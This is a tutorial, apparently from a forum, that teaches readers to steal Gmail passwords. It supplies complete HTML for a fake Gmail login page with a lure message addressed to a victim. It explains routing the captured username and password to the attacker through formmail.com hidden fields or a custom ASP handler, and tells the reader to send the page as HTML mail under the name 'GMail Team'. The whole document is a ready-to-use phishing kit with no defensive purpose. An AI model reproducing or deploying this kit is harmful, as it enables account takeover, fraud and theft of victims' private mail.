Here is the most effective technique for cracking GMail Accounts Passwords.
This method uses ‘Social Engineering’ rather than ‘Phishing’.
Follow the steps as given below :-
Success Rate :- 90%
Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below-
<html lang=”en” dir=”ltr”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″>
<style type=text/css>
<!–
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin-top:2}
.c {width: 4; height: 4}
.bubble {background-color:#C3D9FF}
.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}
.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}
.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}
.feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; }
.feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; }
// –>
</style>
<title>
Gmail: Email from Google
</title>
</noscript>
</head>
<body bgcolor=#ffffff link=#0000FF vlink=#0000FF onload=”OnLoad()”>
<table width=95% border=0 align=center cellpadding=0 cellspacing=0>
<tr valign=top>
<td width=1%> <img src=”https://mail.google.com/mail/help/images/logo.gif” border=0 width=143 height=59 alt=”Gmail” align=left vspace=10/> </noscript>
</td>
<td width=99% bgcolor=#ffffff valign=top>
<table width=100% cellpadding=1>
<tr valign=bottom>
<td><div align=right> </div></td>
</tr>
<tr>
<td nowrap=nowrap>
<table width=100% align=center cellpadding=0 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
<tr>
<td align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif alt=”” /></td>
<script>utmx_section(“title”)</script>
<td rowspan=2 style=”font-family:arial;text-align:left;font-weight:bold;padding:5 0″><b>Welcome to Gmail</b></td>
<td align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif alt=”” /></td>
</noscript>
</tr>
<tr>
<td align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif alt=”” /></td>
<td align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif alt=”” /></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table width=94% align=center cellpadding=5 cellspacing=1>
<tr>
<td valign=top style=”text-align:left”><b>A Google approach to email.</b>
<td valign=top>
</tr>
<tr>
<td width=75% valign=top>
<p style=”margin-bottom: 0;text-align:left”><font size=-1> Dear <b><victim name></b>,
<br><br>
<table align=”center” width=”75%”>
<tr><td><font size=”-1″>
We are moving database partly to our new server.<br>
This require your account verification for proper redirection…!<br>
Please verify yourself by entering correct google account ‘username’ and ‘password’. Click ‘Move’.<br>
Repply this message within 72 hours.<br>
Thank You ! for your Co-Operation……..!
</font><br><br>
<b>GMail Team</b>
</td></tr></table>
</font>
</p>
</noscript>
</noscript> </td> <td valign=top>
<div id=login>
<form id=”gaia_loginform” action=”login.asp” method=”post”>
<div id=”gaia_loginbox”>
<table cellspacing=”3″ cellpadding=”5″ width=”100%” border=”0″>
<tr>
<td valign=”top” style=”text-align:center” nowrap=”nowrap”
bgcolor=”#e8eefa”>
<div>
<table id=”gaia_table” align=”center” border=”0″ cellpadding=”1″ cellspacing=”0″>
<tr>
<td colspan=”2″ align=”center”>
<table>
<tr>
<td valign=”top”><font color=”#0000FF”>G</font><font color=”#FF0000″>o</font><font color=”#FFCC33″>o</font><font color=”#0000FF”>g</font><font color=”#009900″>l</font><font color=”#FF0000″>e</font></td>
<td valign=”middle”> <font size=”+0″><b>Account</b></font>
</td>
</tr>
</table></td>
</tr>
<script type=”text/javascript”><!–
function onPreCreateAccount() {
return true;
}
function onPreLogin() {
if (window[“onlogin”] != null) {
return onlogin();
} else {
return true;
}
}
–></script>
<tr>
<td colspan=”2″ align=”center”> </td>
</tr>
<tr>
<td nowrap=”nowrap”> <div align=”right”> <span>
Username: </span> </div></td>
<td> <input type=”text” name=”Email” id=”Email”
size=”18″ value=””
class=’gaia le val’
/> </td>
</tr>
<tr>
<td></td>
<td align=”left”> </td>
</tr>
<tr>
<td align=”right”> <span> Password:
</span> </td>
<td> <input type=”password”
name=”Passwd” id=”Passwd”
size=”18″
/> </td>
</tr>
<tr>
<td> </td>
<td align=”left”> </td>
</tr>
<tr>
<td> </td>
<td align=”left”> <input type=”submit” name=”signIn”
value=”Move”
/> </td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</div>
</form>
</div> <br>
<table-noindent cellpadding=0 width=100% bgcolor=#E8EEFA id=links>
<tr bgcolor=#E8EEFA>
<td valign=top align=”center”><font size=+0><br>
<font size=”-1″> <a href=”http://mail.google.com/mail/help/intl/en/about.html”>About
Gmail</a
> <a href=”http://mail.google.com/mail/help/intl/en/about_whatsnew.html”>New
features!</a> </font> </font></td>
</table>
</noscript>
</table>
<br>
<table width=95% align=center cellpadding=3 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
<tr>
<td align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif alt=”” /></td>
<td rowspan=2 style=text-align:left>
<div align=center>
<font size=-1 color=#666666>©2008 Google –
<a href=”http://www.google.com/a/help/intl/en/users/user_features.html#utm_medium=et&utm_source=gmail-en&utm_campaign=crossnav&token=gmail_footer”>Gmail for Organizations</a> –
<a href=”http://gmailblog.blogspot.com/?utm_source=en-gmftr&utm_medium=et&utm_content=gmftr”>Gmail Blog</a> –
<a href=”http://mail.google.com/mail/help/intl/en/terms.html”>Terms</a>
– <a href=”http://mail.google.com/support/”>Help</a>
</font>
</div>
</td>
<td align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif alt=”” /></td>
</tr>
<tr>
<td align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif alt=”” /></td>
<td align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif alt=”” /></td>
</tr>
</table>
</body>
</html>
Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-
1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with http://www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-
Your form must start with the following <form> HTML tag:<br>
<form method=”POST” action=”http://fp1.formmail.com/cgi-bin/fm192″>
You must also include the following hidden configuration fields
in your form so that formmail.com knows what account and form processor
to use on the submitted data:
<input type=”hidden” name=”_pid” value=”94566″>
<input type=”hidden” name=”_fid” value=”36THG54Z”>
You must also inform this form processor who you wish to have your
form results emailed to. To do so, you must include a hidden form
field that specifies the recipient:
<input type=”hidden” name=”recipient” value=”your email address”>
Please Note: the above field will work, but an even better solution
is to use the ID number for that email address (thus hiding your
address from spammers):
<input type=”hidden” name=”recipient” value=”1″>
OR
2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. ‘login.asp’ page) for above given fake gmail login form. Here you should only put both ‘gmail.html’ and ‘login.asp’ files to your server.
Step-3 : Now both of your ‘Fake Gmail Login Form (eg. gmail.html)’ and ‘Form Processor’ are ready to use.
Now you can send the fake gmail login form as an html mail to the victim’s e-mail address, hoping that the victim gets fooled into entering the account username and password and click on ‘Move’ button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as ‘GMail Team’ or ‘GMail’ while sending fake login form to victim.
As soon as victim click on ‘Move’ button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her ‘username’ and ‘password’ get emailed to you by formmail.com .
That’s It…………!
SlimShady 
